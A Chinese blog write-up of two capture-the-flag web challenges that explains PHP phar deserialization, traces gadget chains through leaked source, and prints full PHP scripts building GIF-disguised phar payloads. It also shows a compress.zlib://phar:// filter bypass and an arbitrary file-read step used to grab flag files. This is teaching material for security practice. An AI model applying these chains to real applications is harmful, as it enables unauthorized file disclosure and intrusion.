极客巅峰 2020 babyphp2(phar反序列化)

最新推荐文章于 2023-03-29 17:33:21 发布
最新推荐文章于 2023-03-29 17:33:21 发布
阅读量682 收藏 4
点赞数
分类专栏: ctf phar反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNiamcoming/article/details/108883642
版权

文章目录

前言

这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,二脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 最近学的 docker,不熟练,问题不断,如果环境有问题随时联系我, VPS 20年12月10号过期,望见谅。

一、什么是 phar 反序列化

利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介

下面参考Tr0jAn大佬的文章

1.三个条件

  1. 可以上传 phar 文件
  2. 有可以利用的魔术方法
  3. 文件操作函数参数可控

2.生成 phar 文件的常见代码

 $phar = new Phar("phar.phar");

生成 phar 文件,文件名任意,但是扩展名必须是 phar,生成之后可以任意更改

 $phar->startBuffering();
 $phar->stopBuffering();

不是很明白什么意思,仅仅认识 start 和 stop 两个单词,大概是对 phar 对象的操作都在这中间,类似于 打开文件流—>操作文件—>关闭文件流??

$phar->setStub("<?php __HALT_COMPILER(); ?>");

如名,设置 stub,php 以 __HALT_COMPILER(); 来识别 phar ,前面可以有任意数据,php 仅从此开始识别

$phar ->addFromString('test.txt','test');

不是很懂这个到底什么用,但是我看了每份代码都有,而且 test.txt 并不一定需要存在

$c = new test();
$phar -> setMetadata($c);  //将自定义 meta-data 存入 manifest

这是重点,$c 将以序列化的形式保存在 phar 文件中
phar文件

二、题目分析

下载源码

源码在 web 目录下的 www.zip 中,直接访问下载源码
在这里插入图片描述

classes.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

首先是 Reader 类,看到 file_get_contents() 可以想到文件读取,利用 read方法 中的 file_get_contents() 读取 phar 文件,反序列化后执行 __set() 中的 file_get_contents() 读取 flag

那么问题就变成了如何执行 __set() 方法

这时候看 User 类中的 __toString() 方法 ,里面有这么一句$this->nickname->backup=$this->backup; 给类对象一个私有属性或不存在的属性赋值时,如果存在 __set() 方法,那么就会执行该方法

__set() 类似的还有
__get(),调用私有属性或不存的属性时,执行该方法
__call() ,如果调用的方法不存在时,就会执行该方法

那么就好办了,只要执行 User 类的 __toString() 方法,并将 $bickup 赋值为 /flag 就能得到 flag

那么如何执行 __toString() 呢? 可以看到 dbCtrl 类,中有个 echo ,如果能 echo 类的对象,就能触发类中的 __toString() 方法,所以将 dbCtrl 类中的 token 属性赋值为 User 类的对象,那么就大功告成了

能触发 __toString() 的有 echo print printf 等,
var_dump print_r 等则不能触发

生成 phar 文件

来自Tr0jAn大佬,这应该已经是最简洁的了,我就不献丑了吧

<?php
Class Reader{}
Class User{
    public $nickname;
    public $backup="/flag";
}
class dbCtrl{
    public $token;
}
$a = new Reader();
$b = new User();
$b->nickname = $a;
$c = new dbCtrl();
$c->token = $b;

$phar = new Phar('Phar.phar');
$phar -> startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');   //设置 stub,增加 gif 文件头
$phar ->addFromString('test.txt','test');  //添加要压缩的文件
$phar -> setMetadata($c);  //将自定义 meta-data 存入 manifest
$phar -> stopBuffering();

将 php.ini 中 phar.readonly 的值改为 Off ,去掉前面的注释符 ‘;’,即 phar.readonly=Off,运行该代码,可生成 phar 文件,将扩展名改为 gif,如图
phar文件

执行反序列化

在源码泄露中,还可以看到 web 下有 upload 页面和 read 页面
upload 中就一些简单的过滤,绕过已经在前面做了,不是重点
主要看 read,read 中调用了 classes.php 中的 Reader 类的 read() 方法,对传入的 $filename 值进行了过滤,可以看到,$filename 不能以 phar 开头

但是可以使用 compress.zlib://phar:// 去访问 phar 文件
在这里插入图片描述
在 upload.php 上传文件得到路径
在这里插入图片描述
在 read.php 读取 phar.gif,得到 flag

在这里插入图片描述

三、趁热打铁(buu [CISCN2019 华北赛区 Day1 Web1])

任意文件读取

注册登陆,来到一个文件上传的页面,随便上传一个文件,出现了文件列表,并提供了 下载删除 操作

联想到任意文件读取,点击 下载 并抓包,如图更改 filename 的值,读取 index.php
在这里插入图片描述
根据提示,继续读取 class.php 以及 download.php 和 delete.php

class.php

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">涓嬭浇</a> / <a href="#" class="delete">鍒犻櫎</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

File 类的 close() 方法存在敏感函数,file_get_contents($this->filename),查看一下哪里调用了 close()

在这里插入图片描述
在User类的魔术方法 __destruct() 中
在这里插入图片描述
容易想到

创建 File 类的对象,并将 filename 赋为 /flag.txt,然后创建一个 User 类的对象,将 File 的对象赋给 User 的属性 db

乍一想,好像没毛病,但是会发现没有任何回显,因为虽然虽然得到了文件内容,但是并没有输出函数将它输出,

继续分析 class.php,看到 FileList 类有个魔术方法 __call(),刚好$this->db->close();可以触发该魔术方法

在这里插入图片描述
FileList 类的另一个魔术方法 __destruct(),存在 class.php 中的唯一输出
在这里插入图片描述
代码比较多,整体分析一下 FIleList 类
先看__construct()
在这里插入图片描述
__construct() 的重点在创建了一个一维数组和一个二维数组,其中 files 存的是 属性filename被赋值了的File类 ,理清楚 FileList 的属性是什么类型之后再看 __call() 方法就很简单了
在这里插入图片描述
注释中写得很清楚,如果 $func 是 close,$filename 是 /flag.txt 的话会发生什么呢,结果已经显而易见了

再来看看 __destruct()
在这里插入图片描述
可以看到,他最终会显示二维数组 results 的值,而 results 的值根据前面分析应该是 $func($filename) 的结果

生成 phar 文件

<?php

class User {
    public $db;
}

class FileList {
    private $files=array();
	function __construct(){
		$file = new File();
		array_push($this->files,$file);
	}
}

class File {
    public $filename = '/flag.txt';
}

$user = new User();
$filelist = new FileList();

$user->db = $filelist;

$phar = new Phar('Phar.phar');
$phar -> startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); 
$phar ->addFromString('test.txt','test'); 
$phar -> setMetadata($user); 
$phar -> stopBuffering();
rename('Phar.phar','Phar.gif');

?>

get flag

可以看到 delete.php 调用了 File 类的 delete() 方法,而 delete() 方法使用了 unlink() 函数,该函数可以可用来执行 phar 反序列化,参考之前提到的这篇文章 phar简介
在这里插入图片描述

在这里插入图片描述
上传生成文件的 phar 文件,点击 删除 选项并抓包,修改 filename 如下,成功返回 flag
在这里插入图片描述

四、总结

其实和普通的反序列化也没什么区别,不过要以 phar 文件为踏板,达到反序列化的目的,关键是要能上传和用 phar 协议访问 phar 文件

萌新一个,望大佬们多多指点

yจุ๊บng
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
php phar 混淆,深入理解PHP Phar反序列化漏洞原理及利用方法(一)
weixin_35749440的博客
03-11 502
Phar反序列化漏洞是一种较新的攻击向量,用于针对面向对象的PHP应用程序执行代码重用攻击,该攻击方式在Black Hat 2018会议上由安全研究员Sam Thomas公开披露。类似于对编译二进制文件的ROP(Return-oriented Programming)攻击,这种类型的漏洞利用PHP对象注入(POI),这是面向对象的PHP代码上下文中的一种面向属性的编程(POP)。由于其新颖性,这种...
Phar反序列化
xiaolong22333的博客
04-24 2605
在软件中,PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 Phar需要 PHP >= 5.2 在php.ini中将phar.readonly设为Off(注意去掉前面的分号) phar文件的结构 stub:phar文件的标志,必须以.
[CISCN2019 华北赛区 Day1 Web1]Dropbox详解
SHININGENDING的博客
04-23 1881
[CISCN2019 华北赛区 Day1 Web1]Dropbox 一、知识点:信息搜集,Phar反序列化 phar知识点分析 phar文件的结构主要分为四个部分: stub phar文件的表示,类似于gif文件的GIF89a,以 xxx<?php xxx;__HALT__COMPILER();?>为固定形式,前面内容可以变,点必须以__HALT__COMPILER();?>结尾。 2. a mainfest describing the contents 该部分是phar...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6729
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
[代码审计][PHAR]巅峰极客babyphp2学习压缩过滤器触发phar
Y4tacker的博客
09-29 4140
前言:我要当赛棍!!! 文章目录序列化与反序列化基本介绍PHP反序列化漏洞原理常用的魔法函数__wakeup()绕过:CVE-2016-7124__set:巅峰极客babyphp2bypass phar:// 不能出现在首部本题关键源码Phar利用参考文章 序列化与反序列化 基本介绍 序列化是将变量转换为可保存或传输字符串的过程 反序列化就是在适当的时候把这个字符串再转化成之前的变量来使用 php进行序列化的目的是保存一个对象方便以后重用 php提供了serialize和unserialize函数用以进行
2020巅峰极客wp
BIAUTUMN的博客
10-16 850
2020巅峰极客 巅峰极客是给开封市信网办做护网的时候打的比赛,所以比赛体验感并不好,简单写一下wp virus-re 代码分为三部分 以’-‘为间隔,将flag的第一部分转换为整型数字,并且满足后项-前项分别为[0x13,0x19,0x1a,0x1c]。最后一项为len(flag)-lastpos(’-’) 以’-'为间隔,将中间的字符串分别存储到road中 checkflag,即走四个20x…的迷宫,从s->d。以第1点存储的顺序,决定迷宫的顺序。通过确定后面的字符串顺序,前面的数字也会被确定。
phar反序列化
qq_63928796的博客
08-08 487
在软件中,PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发。
巅峰极客2022wp
Pysnow's Blog
08-27 779
巅峰极客2022wp
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
Steadfast:Steadfast2 .phar文件
04-13
Steadfast2 .phar 实际的Steadfast2 .phar 尝试自己编译可能会引起轻微的精神错乱。
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
PHPphar包的使用教程
10-19
php中的phar类似于java中的打包文件jar,即将一个文件夹中的一类文件压缩。下面这篇文章主要给大家介绍了关于PHPphar包使用的相关资料,文中介绍的还是相对比较详细的,需要的朋友们下面来一起看看吧。
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 698
代码审计
PHP反序列化入门之phar
weixin_44304686的博客
06-12 522
原文链接:https://mochazz.github.io/2019/02/02/PHP反序列化入门之phar/ phar介绍 简单来说phar就是php压缩文档。它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// php://等类似,也是一种流包装器。 phar结构由 4 部分组成 stub phar 文件标识,格式为 xxx<?php x...
记一道CTF题babyphp之学习代码注入
xiaotaode2012的专栏
08-18 5291
0x00写在前面的话 最近打算刷刷CTF题目,提升一下自身的见识面,这里碰到了一个代码注入的题目特作记录,大牛勿喷。。。 0x01做题的整体思路 做题的地址,http://web.jarvisoj.com:32798/ 打开地址,随机点击发现都是展示对应的界面,做过开发的我,直觉告诉我应该是传入一个字符串展示对应页面,这样我随机点了一下,发现about里面有
[NSSCTF 2022 Spring Recruit]babyphp
wyxlsm的博客
03-29 166
这个就是简单的绕过 一层一层绕就行了。
php序列化与反序列化
最新发布
07-29
当使用phar://伪协议读取phar文件时,会自动反序列化meta-data中存储的信息,从而导致漏洞触发。\[2\]\[3\] 因此,在开发和使用PHP应用程序时,需要注意对序列化和反序列化操作进行安全处理,避免潜在的安全风险。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值